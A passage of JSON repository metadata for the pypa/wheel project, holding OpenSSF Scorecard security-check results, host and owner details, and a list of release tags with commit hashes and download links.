your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":281742688,"owners_count":26553720,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-30T02:00:06.501Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"pypa","name":"Python Packaging Authority","uuid":"647025","kind":"organization","description":"","email":"info@pypa.io","website":"https://www.pypa.io","location":"United States of America","twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/647025?v=4","repositories_count":58,"last_synced_at":"2025-10-30T00:34:30.821Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/pypa","funding_links":["https://github.com/sponsors/pypa"],"total_stars":88807,"followers":2132,"following":0,"created_at":"2022-11-02T16:21:37.826Z","updated_at":"2025-10-30T00:34:30.821Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa/repositories"},"tags":[{"name":"0.46.1","sha":"7a0ea7f7c3dd73747e37368bb074cd0d9fb49259","kind":"commit","published_at":"2025-04-08T20:53:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.1/manifests"},{"name":"0.46.0","sha":"1da658384bbfc14c091085bb98828e68368a1ed5","kind":"commit","published_at":"2025-04-03T09:39:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.46.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.46.0/manifests"},{"name":"0.45.1","sha":"7855525de4093257e7bfb434877265e227356566","kind":"commit","published_at":"2024-11-23T00:14:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.1/manifests"},{"name":"0.45.0","sha":"d78f0e372199f8294556345d867af4d3cf118418","kind":"commit","published_at":"2024-11-08T21:40:06.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.45.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"7bb46d7727e6e89fe56b3c78297b3af2672bbbe2","kind":"commit","published_at":"2024-08-04T14:48:22.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.44.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"fa33dfd01fd665c1fd90097563b34bce4b5527ef","kind":"commit","published_at":"2024-03-11T19:28:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.43.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"63a09bb3d92630c1d35f4fcc6f79250256aeeb5c","kind":"commit","published_at":"2023-11-26T14:35:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.42.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.42.0/manifests"},{"name":"0.41.3","sha":"a899f1c69ffddf564b904a5de974457c213dc36a","kind":"commit","published_at":"2023-10-30T10:04:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.3/manifests"},{"name":"0.41.2","sha":"e76040b0d970a0fe6211c31888fc929078ba02d9","kind":"commit","published_at":"2023-08-22T09:29:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.2/manifests"},{"name":"0.41.1","sha":"b626a4a2ee6a887c7ad4b984fcb4d465dbfa337d","kind":"commit","published_at":"2023-08-05T13:31:27.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.1/manifests"},{"name":"0.41.0","sha":"95c2d83cde174ed3c34d5a5b53dc3b3a1ace91b6","kind":"commit","published_at":"2023-07-22T10:59:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.41.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"461f7a3a2d4824009ca4855b3300d61e6d405dc4","kind":"commit","published_at":"2023-03-14T14:38:44.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.40.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.40.0/manifests"},{"name":"0.38.4","sha":"814c2efe8e40051039c5a6de6945e04ecdd162ee","kind":"commit","published_at":"2022-11-09T20:33:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.4/manifests"},{"name":"0.38.3","sha":"daeb157c8207b1459fc7baa5f234c165a7a5faf4","kind":"commit","published_at":"2022-11-08T17:46:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.3/manifests"},{"name":"0.38.2","sha":"44193907eb308930de05deed863fb4d157c5c866","kind":"commit","published_at":"2022-11-05T12:52:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.2/manifests"},{"name":"0.38.1","sha":"6f1608dc1a88f00d2390b9044bd655753f39234c","kind":"commit","published_at":"2022-11-04T09:09:25.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.1/manifests"},{"name":"0.38.0","sha":"fcb94cd51f7dfd40d88dff37415750d9e3638d3b","kind":"commit","published_at":"2022-10-20T21:19:31.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.38.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.38.0/manifests"},{"name":"0.37.1","sha":"c716c87ffa528ac9a31de3ed3217058848dc2cd2","kind":"commit","published_at":"2021-12-22T12:19:07.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.1/manifests"},{"name":"0.37.0","sha":"b8c4aa055cea0132776e7e53edce3538710d5b68","kind":"commit","published_at":"2021-08-09T20:44:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.37.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.37.0/manifests"},{"name":"0.36.2","sha":"4fb47f98550f3f43fc0b8c73f518592124ae21bd","kind":"commit","published_at":"2020-12-13T18:07:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.2/manifests"},{"name":"0.36.1","sha":"64550e15fdbc96d5690dc872257edc859c218068","kind":"commit","published_at":"2020-12-04T14:00:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.1/manifests"},{"name":"0.36.0","sha":"39b6397ba944d82f1fe37d043382f97b78a919d6","kind":"commit","published_at":"2020-12-01T08:52:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.36.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.36.0/manifests"},{"name":"0.35.1","sha":"bbc60829bea2eb25ccd236b9c6c16c9ee4f0d2ef","kind":"commit","published_at":"2020-08-14T19:22:54.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.1/manifests"},{"name":"0.35.0","sha":"4253bbb865823101d1a1757d12239fc74f49c4e7","kind":"commit","published_at":"2020-08-13T21:08:53.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.35.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.35.0/manifests"},{"name":"0.34.2","sha":"0036f80513457a95a309c81d8a63f113b52dbafa","kind":"commit","published_at":"2020-01-30T22:20:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.2/manifests"},{"name":"0.34.1","sha":"43078c409ebe9b7d5d70c2476fcb82055e8f0b97","kind":"tag","published_at":"2020-01-27T20:20:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.1/manifests"},{"name":"0.34.0","sha":"8b2312799f46359ac78f3b011dc758c45518e9e1","kind":"commit","published_at":"2020-01-27T08:21:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.34.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.34.0/manifests"},{"name":"0.33.6","sha":"b227ddd5beaba49294017d061d501f6d433393b0","kind":"commit","published_at":"2019-08-18T09:55:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.6/manifests"},{"name":"0.33.5","sha":"9ee9726620f80232ca49991dbeef83963d94482a","kind":"commit","published_at":"2019-08-17T16:13:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.5/manifests"},{"name":"0.33.4","sha":"882cd05d9bf4c4fc72568d806e227b5cf14df1d7","kind":"commit","published_at":"2019-05-11T21:41:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.4/manifests"},{"name":"0.33.3","sha":"7b782219d5322ee66cef293c5c5b49fbd4133a0d","kind":"commit","published_at":"2019-05-10T11:06:01.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.3/manifests"},{"name":"0.33.2","sha":"9534258081b4abf3af817dab976bc95ecc4bfa30","kind":"commit","published_at":"2019-05-09T08:18:30.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.2/manifests"},{"name":"0.33.1","sha":"c15924d80ed2235f277569d99bb9d80f59c9b19d","kind":"commit","published_at":"2019-02-19T14:03:57.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.1/manifests"},{"name":"0.33.0","sha":"bb54233a2dc855951fa40a48d5730c67f9d570c8","kind":"commit","published_at":"2019-02-12T06:58:33.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.33.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.33.0/manifests"},{"name":"0.32.3","sha":"11584b78a56b4eedba4eedc55c9dac8aa2dd7070","kind":"commit","published_at":"2018-11-19T00:16:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.3/manifests"},{"name":"0.32.2","sha":"3d3708c659f7b9988f958539e7748a1a01ee6e77","kind":"commit","published_at":"2018-10-20T20:03:14.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.2/manifests"},{"name":"0.32.1","sha":"e284ddf676adffa22f6d6a7b02be7328acfe23c4","kind":"commit","published_at":"2018-10-04T06:42:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.1/manifests"},{"name":"0.32.0","sha":"46e55b9bc7ac63d4c3a4dee706515968d58848ac","kind":"commit","published_at":"2018-09-29T15:36:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.32.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.32.0/manifests"},{"name":"0.31.1","sh